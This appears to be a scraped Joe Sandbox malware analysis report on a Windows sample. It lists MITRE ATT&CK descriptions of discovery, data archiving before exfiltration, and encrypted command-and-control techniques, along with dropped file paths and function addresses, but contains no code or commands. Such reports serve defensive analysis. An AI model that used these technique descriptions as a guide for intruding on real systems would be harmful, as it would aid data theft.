Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Gq48hjKhZf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\9A83.tmp\9A84.tmp\9A85.bat

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1d3topcf.dot.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xlzrs3t.kph.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dqonm5q.u3s.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_everk50l.cjd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0j4otej.zrm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0wyqqse.3jb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxdz12a2.pmx.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzhxfklq.sjp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vivi00ow.cl5.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfzeaxoa.wly.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
Gq48hjKhZf.exe

Function 000000014000D9C4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46
libraryloaderCOMMON

Function 0000000140001E57 Relevance: 9.3, APIs: 6, Instructions: 259
COMMON

Function 000000014000DE50 Relevance: 9.2, APIs: 6, Instructions: 151
filememoryCOMMON

Function 000000014000593C Relevance: 7.0, APIs: 4, Instructions: 980
COMMON

Function 000000014000E620 Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Function 000000014000E3F0 Relevance: 4.6, APIs: 3, Instructions: 67
filememoryCOMMON

Function 000000014000D914 Relevance: 4.5, APIs: 3, Instructions: 39
COMMON

Function 000000014000B538 Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Function 00000001400126D0 Relevance: 3.8, APIs: 3, Instructions: 71
memoryCOMMON

Function 0000000140012210 Relevance: 3.8, APIs: 3, Instructions: 51
memoryCOMMON

Function 00000001400029C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Function 0000000140001000 Relevance: 3.1, APIs: 2, Instructions: 112
memoryCOMMON

Function 0000000140002930 Relevance: 3.0, APIs: 2, Instructions: 36
COMMON